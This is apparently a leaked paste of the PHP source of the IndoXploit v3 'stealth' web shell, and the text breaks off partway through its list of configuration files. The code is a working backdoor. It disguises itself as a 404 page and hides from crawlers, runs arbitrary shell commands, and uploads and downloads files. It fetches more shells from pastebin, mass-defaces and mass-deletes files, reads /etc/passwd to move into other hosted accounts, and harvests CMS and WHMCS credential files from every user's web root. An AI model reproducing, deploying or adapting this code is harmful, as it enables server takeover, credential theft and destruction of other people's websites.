· 7 years ago · Dec 24, 2018, 09:40 PM
1Leaked by : PELITABANGSA .CA[ INDONESIA CYBER ATTACK AND MALWARE ANALYST ]
2<?php
3/*
4* # IndoXploit v3 Web Shell (Stealth Version)
5* # What was involved?
6* - Uses dynamic 404 page from the server to make the web shell looks like it was deleted
7* - Login method is by using GET parameters, (example: 'http://example.com/idx_s.php?passwd=password_saia_kaka')
8* # Important Bookmark
9* - Password configuration at line 27
10* - login_shell() function at line 40-52
11* - Login validation at line 57-64
12*/
13session_start();
14@error_reporting(0);
15@set_time_limit(0);
16
17if(version_compare(PHP_VERSION, '5.3.0', '<')) {
18 @set_magic_quotes_runtime(0);
19}
20
21@clearstatcache();
22@ini_set('error_log',NULL);
23@ini_set('log_errors',0);
24@ini_set('max_execution_time',0);
25@ini_set('output_buffering',0);
26@ini_set('display_errors', 0);
27
28$paswword= "";
29
30$SERVERIP = (!$_SERVER['SERVER_ADDR']) ? gethostbyname($_SERVER['HTTP_HOST']) : $_SERVER['SERVER_ADDR'];
31$FILEPATH = str_replace($_SERVER['DOCUMENT_ROOT'], "", path());
32
33if(!empty($_SERVER['HTTP_USER_AGENT'])) {
34 $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot", "curl");
35 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
36 header('HTTP/1.0 404 Not Found');
37 exit;
38 }
39}
40
41function login_shell() {
42$random_url = mt_rand(1000000, 247345736453);
43$curl = curl_init();
44$protocol = 'http://';
45if(isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] != 'off') { $protocol = 'https://'; }
46curl_setopt($curl, CURLOPT_URL, $protocol . $_SERVER['HTTP_HOST'] . '/' . $random_url);
47curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
48$server_404 = curl_exec($curl);
49$server_404 = str_replace("/{$random_url}", $_SERVER['SCRIPT_NAME'], $server_404);
50$server_404 = str_replace("{$random_url}", $_SERVER['SCRIPT_NAME'], $server_404);
51echo $server_404;
52exit;
53}
54if(@$_GET['this'] == "phpinfo") {
55 echo phpinfo();
56 exit();
57}
58if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) {
59 if(empty($password) || (isset($_GET['passwd']) && (md5($_GET['passwd']) == $password))) {
60 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
61 echo "<script>document.location.href = '?'</script>";
62 } else {
63 login_shell();
64 }
65}
66if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
67 @ob_clean();
68 $file = $_GET['file'];
69 header('Content-Description: File Transfer');
70 header('Content-Type: application/octet-stream');
71 header('Content-Disposition: attachment; filename="'.basename($file).'"');
72 header('Expires: 0');
73 header('Cache-Control: must-revalidate');
74 header('Pragma: public');
75 header('Content-Length: ' . filesize($file));
76 readfile($file);
77 exit;
78}
79
80if(get_magic_quotes_gpc()) {
81 function idx_ss($array) {
82 return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
83 }
84 $_POST = idx_ss($_POST);
85}
86?>
87<!DOCTYPE HTML>
88<html>
89<!--
90###############################################################################
91// Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
92// Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
93// Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
94// Tanpa kalian kita tidak akan BESAR seperti sekarang.
95// Greetz: All Member IndoXploit. & All My Friends.
96###############################################################################
97// Special Thanks: Depok Cyber Security | Sanjungan Jiwa | 0x1999
98###############################################################################
99-->
100<head>
101<title>IndoXploit</title>
102<meta name='author' content='IndoXploit'>
103<meta charset="UTF-8">
104<style type='text/css'>
105@import url(https://fonts.googleapis.com/css?family=Ubuntu);
106html {
107 background: #000000;
108 color: #ffffff;
109 font-size: 14px;
110 width: 100%;
111}
112
113li {
114 display: inline;
115 margin: 5px;
116 padding: 5px;
117}
118
119a {
120 color: #ffffff;
121 text-decoration: none;
122}
123
124a:hover {
125 color: gold;
126 text-decoration: underline;
127}
128
129b {
130 color: gold;
131}
132
133pre {
134 font-size: 13px;
135}
136
137table, th, td {
138 border-collapse:collapse;
139 background: transparent;
140 font-family: 'Ubuntu';
141 font-size: 13px;
142}
143
144.table_home, .th_home, .td_home {
145 border: 1px solid #ffffff;
146}
147
148.th_home {
149 color: lime;
150}
151
152.td_home, .td_home > a {
153 color: #ffffff;
154}
155
156.td_home > a:hover {
157 color: gold;
158}
159
160th {
161 padding: 10px;
162}
163
164tr:hover {
165 background: #006400;
166 color: #ffffff;
167}
168
169input[type=text], input[type=password], .input {
170 background: transparent;
171 color: #ffffff;
172 border: 1px solid #ffffff;
173 padding: 3px;
174 font-family: 'Ubuntu';
175 font-size: 13px;
176}
177
178input[type=submit] {
179 padding: 2px;}
180
181input[type=submit]:hover {
182 cursor: pointer;
183}
184
185input:focus, textarea:focus {
186 outline: 0;
187 border-color: #ffffff;
188}
189
190textarea {
191 border: 1px solid #ffffff;
192 width: 100%;
193 height: 400px;
194 padding-left: 5px;
195 margin: 10px auto;
196 resize: none;
197 background: transparent;
198 color: #ffffff;
199 font-family: 'Ubuntu';
200 font-size: 13px;
201}
202iframe {
203 width: 100%;
204 min-height: 500px;
205}
206</style>
207</head>
208<body>
209<?php
210function path() {
211 if(isset($_GET['dir'])) {
212 $dir = str_replace("\\", "/", $_GET['dir']);
213 @chdir($dir);
214 } else {
215 $dir = str_replace("\\", "/", getcwd());
216 }
217 return $dir;
218}
219
220function color($bold = 1, $colorid = null, $string = null) {
221 $color = array(
222 "</font>", # 0 off
223 "<font color='red'>", # 1 red
224 "<font color='lime'>", # 2 lime
225 "<font color='white'>", # 3 white
226 "<font color='gold'>", # 4 gold
227 );
228
229 return ($string !== null) ? $color[$colorid].$string.$color[0]: $color[$colorid];
230}
231
232function OS() {
233 return (substr(strtoupper(PHP_OS), 0, 3) === "WIN") ? "Windows" : "Linux";
234}
235
236function exe($cmd) {
237 if(function_exists('system')) {
238 @ob_start();
239 @system($cmd);
240 $buff = @ob_get_contents();
241 @ob_end_clean();
242 return $buff;
243 } elseif(function_exists('exec')) {
244 @exec($cmd,$results);
245 $buff = "";
246 foreach($results as $result) {
247 $buff .= $result;
248 } return $buff;
249 } elseif(function_exists('passthru')) {
250 @ob_start();
251 @passthru($cmd);
252 $buff = @ob_get_contents();
253 @ob_end_clean();
254 return $buff;
255 } elseif(function_exists('shell_exec')) {
256 $buff = @shell_exec($cmd);
257 return $buff;
258 }
259}
260
261function save($filename, $mode, $file) {
262 $handle = fopen($filename, $mode);
263 fwrite($handle, $file);
264 fclose($handle);
265 return;
266}
267
268function getfile($name) {
269 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't spawn $name."));
270 if($name === "adminer") $get = array("https://www.adminer.org/static/download/4.3.1/adminer-4.3.1.php", "adminer.php");
271 elseif($name === "webconsole") $get = array("https://pastebin.com/raw/2i96fDCN", "webconsole.php");
272 elseif($name === "cgitelnet1") $get = array("https://pastebin.com/raw/Lj46KxFT", "idx_cgi/cgitelnet1.idx");
273 elseif($name === "cgitelnet2") $get = array("https://pastebin.com/raw/aKL2QWfS", "idx_cgi/cgitelnet2.idx");
274 elseif($name === "LRE") $get = array("https://pastebin.com/raw/PVPfA21i", "makman.php");
275
276 $fp = fopen($get[1], "w");
277 $ch = curl_init();
278 curl_setopt($ch, CURLOPT_URL, $get[0]);
279 curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
280 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
281 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
282 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
283 curl_setopt($ch, CURLOPT_FILE, $fp);
284 return curl_exec($ch);
285 curl_close($ch);
286 fclose($fp);
287 ob_flush();
288 flush();
289}
290
291function usergroup() {
292 if(!function_exists('posix_getegid')) {
293 $user['name'] = @get_current_user();
294 $user['uid'] = @getmyuid();
295 $user['gid'] = @getmygid();
296 $user['group'] = "?";
297 } else {
298 $user['uid'] = @posix_getpwuid(posix_geteuid());
299 $user['gid'] = @posix_getgrgid(posix_getegid());
300 $user['name'] = $user['uid']['name'];
301 $user['uid'] = $user['uid']['uid'];
302 $user['group'] = $user['gid']['name'];
303 $user['gid'] = $user['gid']['gid'];
304 }
305 return (object) $user;
306}
307
308function getuser() {
309 $fopen = fopen("/etc/passwd", "r") or die(color(1, 1, "Can't read /etc/passwd"));
310 while($read = fgets($fopen)) {
311 preg_match_all('/(.*?):x:/', $read, $getuser);
312 $user[] = $getuser[1][0];
313 }
314 return $user;
315}
316
317function getdomainname() {
318 $fopen = fopen("/etc/named.conf", "r");
319 while($read = fgets($fopen)) {
320 preg_match_all("#/var/named/(.*?).db#", $read, $getdomain);
321 $domain[] = $getdomain[1][0];
322 }
323 return $domain;
324}
325
326function hddsize($size) {
327 if($size >= 1073741824)
328 return sprintf('%1.2f',$size / 1073741824 ).' GB';
329 elseif($size >= 1048576)
330 return sprintf('%1.2f',$size / 1048576 ) .' MB';
331 elseif($size >= 1024)
332 return sprintf('%1.2f',$size / 1024 ) .' KB';
333 else
334 return $size .' B';
335}
336
337function hdd() {
338 $hdd['size'] = hddsize(disk_total_space("/"));
339 $hdd['free'] = hddsize(disk_free_space("/"));
340 $hdd['used'] = $hdd['size'] - $hdd['free'];
341 return (object) $hdd;
342}
343
344function writeable($path, $perms) {
345 return (!is_writable($path)) ? color(1, 1, $perms) : color(1, 2, $perms);
346}
347
348function perms($path) {
349 $perms = fileperms($path);
350 if (($perms & 0xC000) == 0xC000) {
351 // Socket
352 $info = 's';
353 }
354 elseif (($perms & 0xA000) == 0xA000) {
355 // Symbolic Link
356 $info = 'l';
357 }
358 elseif (($perms & 0x8000) == 0x8000) {
359 // Regular
360 $info = '-';
361 }
362 elseif (($perms & 0x6000) == 0x6000) {
363 // Block special
364 $info = 'b';
365 }
366 elseif (($perms & 0x4000) == 0x4000) {
367 // Directory
368 $info = 'd';
369 }
370 elseif (($perms & 0x2000) == 0x2000) {
371 // Character special
372 $info = 'c';
373 }
374 elseif (($perms & 0x1000) == 0x1000) {
375 // FIFO pipe
376 $info = 'p';
377 }
378 else {
379 // Unknown
380 $info = 'u';
381 }
382 // Owner
383 $info .= (($perms & 0x0100) ? 'r' : '-');
384 $info .= (($perms & 0x0080) ? 'w' : '-');
385 $info .= (($perms & 0x0040) ?
386 (($perms & 0x0800) ? 's' : 'x' ) :
387 (($perms & 0x0800) ? 'S' : '-'));
388 // Group
389 $info .= (($perms & 0x0020) ? 'r' : '-');
390 $info .= (($perms & 0x0010) ? 'w' : '-');
391 $info .= (($perms & 0x0008) ?
392 (($perms & 0x0400) ? 's' : 'x' ) :
393 (($perms & 0x0400) ? 'S' : '-'));
394 // World
395 $info .= (($perms & 0x0004) ? 'r' : '-');
396 $info .= (($perms & 0x0002) ? 'w' : '-');
397 $info .= (($perms & 0x0001) ?
398 (($perms & 0x0200) ? 't' : 'x' ) :
399 (($perms & 0x0200) ? 'T' : '-'));
400
401 return $info;
402}
403
404function lib_installed() {
405 $lib[] = "MySQL: ".(function_exists('mysql_connect') ? color(1, 2, "ON") : color(1, 1, "OFF"));
406 $lib[] = "cURL: ".(function_exists('curl_version') ? color(1, 2, "ON") : color(1, 1, "OFF"));
407 $lib[] = "WGET: ".(exe('wget --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
408 $lib[] = "Perl: ".(exe('perl --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
409 $lib[] = "Python: ".(exe('python --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
410 return implode(" | ", $lib);
411}
412
413function pwd() {
414 $dir = explode("/", path());
415 foreach($dir as $key => $index) {
416 print "<a href='?dir=";
417 for($i = 0; $i <= $key; $i++) {
418 print $dir[$i];
419 if($i != $key) {
420 print "/";
421 }
422 }
423 print "'>$index</a>/";
424 }
425 print "<br>";
426 print (OS() === "Windows") ? windisk() : "";
427}
428
429function windisk() {
430 $letters = "";
431 $v = explode("\\", path());
432 $v = $v[0];
433 foreach(range("A", "Z") as $letter) {
434 $bool = $isdiskette = in_array($letter, array("A"));
435 if(!$bool) $bool = is_dir("$letter:\\");
436 if($bool) {
437 $letters .= "[ <a href='?dir=$letter:\\'".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">";
438 if($letter.":" != $v) {
439 $letters .= $letter;
440 }
441 else {
442 $letters .= color(1, 2, $letter);
443 }
444 $letters .= "</a> ]";
445 }
446 }
447 if(!empty($letters)) {
448 print "Detected Drives $letters<br>";
449 }
450 if(count($quicklaunch) > 0) {
451 foreach($quicklaunch as $item) {
452 $v = realpath(path(). "..");
453 if(empty($v)) {
454 $a = explode(DIRECTORY_SEPARATOR,path());
455 unset($a[count($a)-2]);
456 $v = join(DIRECTORY_SEPARATOR, $a);
457 }
458 print "<a href='".$item[1]."'>".$item[0]."</a>";
459 }
460 }
461}
462
463function serverinfo() {
464 $disable_functions = @ini_get('disable_functions');
465 $disable_functions = (!empty($disable_functions)) ? color(1, 1, $disable_functions) : color(1, 2, "NONE");
466
467 $output[] = "SERVER IP ".color(1, 2, $GLOBALS['SERVERIP'])." / YOUR IP ".color(1, 2, $_SERVER['REMOTE_ADDR']);
468 $output[] = "WEB SERVER : ".color(1, 2, $_SERVER['SERVER_SOFTWARE']);
469 $output[] = "SYSTEM : ".color(1, 2, php_uname());
470 $output[] = "USER / GROUP: ".color(1, 2, usergroup()->name)."(".color(1, 2 , usergroup()->uid).") / ".color(1, 2 , usergroup()->group)."(".color(1, 2 , usergroup()->gid).")";
471 $output[] = "HDD : ".color(1, 2, hdd()->used)." / ".color(1, 2 , hdd()->size)." (Free: ".color(1, 2 , hdd()->free).")";
472 $output[] = "PHP VERSION : ".color(1, 2, @phpversion());
473 $output[] = "SAFE MODE : ".(@ini_get(strtoupper("safe_mode")) === "ON" ? color(1, 2, "ON") : color(1, 2, "OFF"));
474 $output[] = "DISABLE FUNC: $disable_functions";
475 $output[] = lib_installed();
476 $output[] = "Current Dir (".writeable(path(), perms(path())).") ";
477
478 print "<pre>";
479 print implode("<br>", $output);
480 pwd();
481 print "</pre>";
482
483}
484
485function curl($url, $post = false, $data = null) {
486 $ch = curl_init($url);
487 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
488 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
489 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
490 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
491 curl_setopt($ch, CURLOPT_TIMEOUT, 10);
492 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
493 if($post) {
494 curl_setopt($ch, CURLOPT_POST, true);
495 curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
496 }
497 return curl_exec($ch);
498 curl_close($ch);
499}
500
501function reverse() {
502 $response = curl("http://domains.yougetsignal.com/domains.php", TRUE, "remoteAddress=".$GLOBALS['SERVERIP']."&ket=");
503 $response = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $response)))))))))))));
504 $explode = explode(",,", $response);
505 unset($explode[0]);
506
507 foreach($explode as $domain) {
508 $domain = "http://$domain";
509 $domain = str_replace(",", "", $domain);
510 $url[] = $domain;
511 ob_flush();
512 flush();
513 }
514
515 return $url;
516}
517
518function getValue($param, $kata1, $kata2){
519 if(strpos($param, $kata1) === FALSE) return FALSE;
520 if(strpos($param, $kata2) === FALSE) return FALSE;
521 $start = strpos($param, $kata1) + strlen($kata1);
522 $end = strpos($param, $kata2, $start);
523 $return = substr($param, $start, $end - $start);
524 return $return;
525}
526
527function massdeface($dir, $file, $filename, $type = null) {
528 $scandir = scandir($dir);
529 foreach($scandir as $dir_) {
530 $path = "$dir/$dir_";
531 $location = "$path/$filename";
532 if($dir_ === "." || $dir_ === "..") {
533 file_put_contents($location, $file);
534 }
535 else {
536 if(is_dir($path) AND is_writable($path)) {
537 print "[".color(1, 2, "DONE")."] ".color(1, 4, $location)."<br>";
538 file_put_contents($location, $file);
539 if($type === "-alldir") {
540 massdeface($path, $file, $filename, "-alldir");
541 }
542 }
543 }
544 }
545}
546
547function massdelete($dir, $filename) {
548 $scandir = scandir($dir);
549 foreach($scandir as $dir_) {
550 $path = "$dir/$dir_";
551 $location = "$path/$filename";
552 if($dir_ === '.') {
553 if(file_exists("$dir/$filename")) {
554 unlink("$dir/$filename");
555 }
556 }
557 elseif($dir_ === '..') {
558 if(file_exists(dirname($dir)."/$filename")) {
559 unlink(dirname($dir)."/$filename");
560 }
561 }
562 else {
563 if(is_dir($path) AND is_writable($path)) {
564 if(file_exists($location)) {
565 print "[".color(1, 2, "DELETED")."] ".color(1, 4, $location)."<br>";
566 unlink($location);
567 massdelete($path, $filename);
568 }
569 }
570 }
571 }
572}
573
574function tools($toolsname, $args = null) {
575 if($toolsname === "cmd") {
576 print "<form method='post' action='?do=cmd&dir=".path()."' style='margin-top: 15px;'>
577 ".usergroup()->name."@".$GLOBALS['SERVERIP'].": ~ $
578 <input style='border: none; border-bottom: 1px solid #ffffff;' type='text' name='cmd' required>
579 <input style='border: none; border-bottom: 1px solid #ffffff;' class='input' type='submit' value='>>'>
580 </form>";
581 }
582 elseif($toolsname === "readfile") {
583 if(empty($args)) die(color(1, 1, $msg));
584 if(!is_file($args)) die(color(1, 1, "File '$args' is not exists."));
585
586 print "<pre>";
587 print htmlspecialchars(file_get_contents($args));
588 print "</pre>";
589 }
590 elseif($toolsname === "spawn") {
591 if($args === "adminer") {
592 if(file_exists("adminer.php")) {
593 print "Login Adminer: <a href='".$GLOBALS['FILEPATH']."/adminer.php' target='_blank'>http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/adminer.php</a>";
594 }
595 else {
596 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'Adminer'."));
597 if(getfile("adminer")) {
598 print "Login Adminer: <a href='".$GLOBALS['FILEPATH']."/adminer.php' target='_blank'>http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/adminer.php</a>";
599 }
600 else {
601 print color(1, 1, "Error while downloading file Adminer.");
602 @unlink("adminer.php");
603 }
604 }
605 }
606 elseif($args === "webconsole") {
607 if(file_exists("webconsole.php")) {
608 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/webconsole.php' frameborder='0' scrolling='yes'></iframe>";
609 }
610 else {
611 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'WebConsole'."));
612 if(getfile("webconsole")) {
613 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/webconsole.php' frameborder='0' scrolling='yes'></iframe>";
614 }
615 else {
616 print color(1, 1, "Error while downloading file WebConsole.");
617 @unlink("webconsole.php");
618 }
619 }
620 }
621 elseif($args === "cgitelnet1") {
622 if(file_exists("idx_cgi/cgitelnet1.idx")) {
623 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet1.idx' frameborder='0' scrolling='yes'></iframe>";
624 }
625 elseif(file_exists('cgitelnet1.idx')) {
626 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/cgitelnet1.idx' frameborder='0' scrolling='yes'></iframe>";
627 }
628 else {
629 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_cgi'."));
630 if(!is_dir(path()."/idx_cgi/")) {
631 @mkdir('idx_cgi', 0755);
632 save("idx_cgi/.htaccess", "w", "AddHandler cgi-script .idx");
633 }
634 if(getfile("cgitelnet1")) {
635 chmod('idx_cgi/cgitelnet1.idx', 0755);
636 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet1.idx' frameborder='0' scrolling='yes'></iframe>";
637 }
638 else {
639 print color(1, 1, "Error while downloading file CGI Telnet.");
640 @rmdir(path()."/idx_cgi/");
641 if(!@rmdir(path()."/idx_cgi/") AND OS() === "Linux") @exe("rm -rf ".path()."/idx_cgi/");
642 if(!@rmdir(path()."/idx_cgi/") AND OS() === "Windows") @exe("rmdir /s /q ".path()."/idx_cgi/");
643 }
644 }
645
646 }
647 elseif($args === "cgitelnet2") {
648 if(file_exists("idx_cgi/cgitelnet2.idx")) {
649 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet2.idx' frameborder='0' scrolling='yes'></iframe>";
650 }
651 elseif(file_exists('cgitelnet2.idx')) {
652 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/cgitelnet2.idx' frameborder='0' scrolling='no'></iframe>";
653 }
654 else {
655 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_cgi'."));
656 if(!is_dir(path()."/idx_cgi/")) {
657 @mkdir('idx_cgi', 0755);
658 save("idx_cgi/.htaccess", "w", "AddHandler cgi-script .idx");
659 }
660 if(getfile("cgitelnet2")) {
661 chmod('idx_cgi/cgitelnet2.idx', 0755);
662 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet2.idx' frameborder='0' scrolling='yes'></iframe>";
663 }
664 else {
665 print color(1, 1, "Error while downloading file CGI Telnet.");
666 @rmdir(path()."/idx_cgi/");
667 if(!@rmdir(path()."/idx_cgi/") AND OS() === "Linux") @exe("rm -rf ".path()."/idx_cgi/");
668 if(!@rmdir(path()."/idx_cgi/") AND OS() === "Windows") @exe("rmdir /s /q ".path()."/idx_cgi/");
669 }
670 }
671
672 }
673 elseif($args === "phpinfo") {
674 if(file_exists('phpinfo.php') AND preg_match("/phpinfo()/", file_get_contents('phpinfo.php'))) {
675 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/phpinfo.php' frameborder='0' scrolling='yes'></iframe>";
676 }
677 else {
678 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'phpinfo'."));
679 save("phpinfo.php", "w", "<?php print '<html><style>html,body {background: #000000;}</style><div style=\'background: #000000; color: #cccccc;\'>'; phpinfo(); print '</div></html>'; ?>");
680 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/phpinfo.php' frameborder='0' scrolling='yes'></iframe>";
681 }
682 }
683 }
684 elseif($toolsname === "upload") {
685 if($_POST['upload']) {
686 if($_POST['uploadtype'] === '1') {
687 if(@copy($_FILES['file']['tmp_name'], path().DIRECTORY_SEPARATOR.$_FILES['file']['name']."")) {
688 $act = color(1, 2, "Uploaded!")." at <i><b>".path().DIRECTORY_SEPARATOR.$_FILES['file']['name']."</b></i>";
689 }
690 else {
691 $act = color(1, 1, "Failed to upload file!");
692 }
693 }
694 elseif($_POST['uploadtype'] === '2') {
695 $root = $_SERVER['DOCUMENT_ROOT'].DIRECTORY_SEPARATOR.$_FILES['file']['name'];
696 $web = $_SERVER['HTTP_HOST'].DIRECTORY_SEPARATOR.$_FILES['file']['name'];
697 if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
698 if(@copy($_FILES['file']['tmp_name'], $root)) {
699 $act = color(1, 2, "Uploaded!")." at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
700 }
701 else {
702 $act = color(1, 1, "Failed to upload file!");
703 }
704 }
705 else {
706 $act = color(1, 1, "Failed to upload file!");
707 }
708 }
709 }
710 print "Upload File: $act
711 <form method='post' enctype='multipart/form-data'>
712 <input type='radio' name='uploadtype' value='1' checked>current_dir [ ".writeable(path(), "Writeable")." ]
713 <input type='radio' name='uploadtype' value='2'>document_root [ ".writeable($_SERVER['DOCUMENT_ROOT'], "Writeable")." ]<br>
714 <input type='file' name='file'>
715 <input type='submit' value='upload' name='upload'>
716 </form>";
717 }
718 elseif($toolsname === "jumping") {
719 $i = 0;
720 foreach(getuser() as $user) {
721 $path = "/home/$user/public_html";
722 if(is_readable($path)) {
723 $status = color(1, 2, "[R]");
724 if(is_writable($path)) {
725 $status = color(1, 2, "[RW]");
726 }
727 $i++;
728 print "$status <a href='?dir=$path'>".color(1, 4, $path)."</a>";
729 if(!function_exists('posix_getpwuid')) print "<br>";
730 if(!getdomainname()) print " => ".color(1, 1, "Can't get domain name")."<br>";
731 foreach(getdomainname() as $domain) {
732 $userdomain = (object) @posix_getpwuid(@fileowner("/etc/valiases/$domain"));
733 $userdomain = $userdomain->name;
734 if($userdomain === $user) {
735 print " => <a href='http://$domain/' target='_blank'>".color(1, 2, $domain)."</a><br>";
736 break;
737 }
738 }
739 }
740 }
741 print ($i === 0) ? "" : "<p>".color(1, 3, "Total ada $i kamar di ".$GLOBALS['SERVERIP'])."</p>";
742 }
743 elseif($toolsname === "idxconfig") {
744 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_config'."));
745 if(!is_dir(path()."/idx_config/")) {
746 @mkdir('idx_config', 0755);
747 $htaccess = "Options all\nDirectoryIndex indoxploit.htm\nSatisfy Any";
748 save("idx_config/.htaccess","w", $htaccess);
749
750 foreach(getuser() as $user) {
751 $user_docroot = "/home/$user/public_html/";
752 if(is_readable($user_docroot)) {
753 $getconfig = array(
754 "/home/$user/.accesshash" => "WHM-accesshash",
755 "$user_docroot/config/koneksi.php" => "Lokomedia",
756 "$user_docroot/forum/config.php" => "phpBB",
757 "$user_docroot/sites/default/settings.php" => "Drupal",
758 "$user_docroot/config/settings.inc.php" => "PrestaShop",
759 "$user_docroot/app/etc/local.xml" => "Magento",
760 "$user_docroot/admin/config.php" => "OpenCart",
761 "$user_docroot/application/config/database.php" => "Ellislab",
762 "$user_docroot/vb/includes/config.php" => "Vbulletin",
763 "$user_docroot/includes/config.php" => "Vbulletin",
764 "$user_docroot/forum/includes/config.php" => "Vbulletin",
765 "$user_docroot/forums/includes/config.php" => "Vbulletin",
766 "$user_docroot/cc/includes/config.php" => "Vbulletin",
767 "$user_docroot/inc/config.php" => "MyBB",
768 "$user_docroot/includes/configure.php" => "OsCommerce",
769 "$user_docroot/shop/includes/configure.php" => "OsCommerce",
770 "$user_docroot/os/includes/configure.php" => "OsCommerce",
771 "$user_docroot/oscom/includes/configure.php" => "OsCommerce",
772 "$user_docroot/products/includes/configure.php" => "OsCommerce",
773 "$user_docroot/cart/includes/configure.php" => "OsCommerce",
774 "$user_docroot/inc/conf_global.php" => "IPB",
775 "$user_docroot/wp-config.php" => "Wordpress",
776 "$user_docroot/wp/test/wp-config.php" => "Wordpress",
777 "$user_docroot/blog/wp-config.php" => "Wordpress",
778 "$user_docroot/beta/wp-config.php" => "Wordpress",
779 "$user_docroot/portal/wp-config.php" => "Wordpress",
780 "$user_docroot/site/wp-config.php" => "Wordpress",
781 "$user_docroot/wp/wp-config.php" => "Wordpress",
782 "$user_docroot/WP/wp-config.php" => "Wordpress",
783 "$user_docroot/news/wp-config.php" => "Wordpress",
784 "$user_docroot/wordpress/wp-config.php" => "Wordpress",
785 "$user_docroot/test/wp-config.php" => "Wordpress",
786 "$user_docroot/demo/wp-config.php" => "Wordpress",
787 "$user_docroot/home/wp-config.php" => "Wordpress",
788 "$user_docroot/v1/wp-config.php" => "Wordpress",
789 "$user_docroot/v2/wp-config.php" => "Wordpress",
790 "$user_docroot/press/wp-config.php" => "Wordpress",
791 "$user_docroot/new/wp-config.php" => "Wordpress",
792 "$user_docroot/blogs/wp-config.php" => "Wordpress",
793 "$user_docroot/configuration.php" => "Joomla",
794 "$user_docroot/blog/configuration.php" => "Joomla",
795 "$user_docroot/submitticket.php" => "^WHMCS",
796 "$user_docroot/cms/configuration.php" => "Joomla",
797 "$user_docroot/beta/configuration.php" => "Joomla",
798 "$user_docroot/portal/configuration.php" => "Joomla",
799 "$user_docroot/site/configuration.php" => "Joomla",
800 "$user_docroot/main/configuration.php" => "Joomla",
801 "$user_docroot/home/configuration.php" => "Joomla",
802 "$user_docroot/demo/configuration.php" => "Joomla",
803 "$user_docroot/test/configuration.php" => "Joomla",
804 "$user_docroot/v1/configuration.php" => "Joomla",
805 "$user_docroot/v2/configuration.php" => "Joomla",
806 "$user_docroot/joomla/configuration.php" => "Joomla",
807 "$user_docroot/new/configuration.php" => "Joomla",
808 "$user_docroot/WHMCS/submitticket.php" => "WHMCS",
809 "$user_docroot/whmcs1/submitticket.php" => "WHMCS",
810 "$user_docroot/Whmcs/submitticket.php" => "WHMCS",
811 "$user_docroot/whmcs/submitticket.php" => "WHMCS",
812 "$user_docroot/whmcs/submitticket.php" => "WHMCS",
813 "$user_docroot/WHMC/submitticket.php" => "WHMCS",
814 "$user_docroot/Whmc/submitticket.php" => "WHMCS",
815 "$user_docroot/whmc/submitticket.php" => "WHMCS",
816 "$user_docroot/WHM/submitticket.php" => "WHMCS",
817 "$user_docroot/Whm/submitticket.php" => "WHMCS",
818 "$user_docroot/whm/submitticket.php" => "WHMCS",
819 "$user_docroot/HOST/submitticket.php" => "WHMCS",
820 "$user_docroot/Host/submitticket.php" => "WHMCS",
821 "$user_docroot/host/submitticket.php" => "WHMCS",
822 "$user_docroot/SUPPORTES/submitticket.php" => "WHMCS",
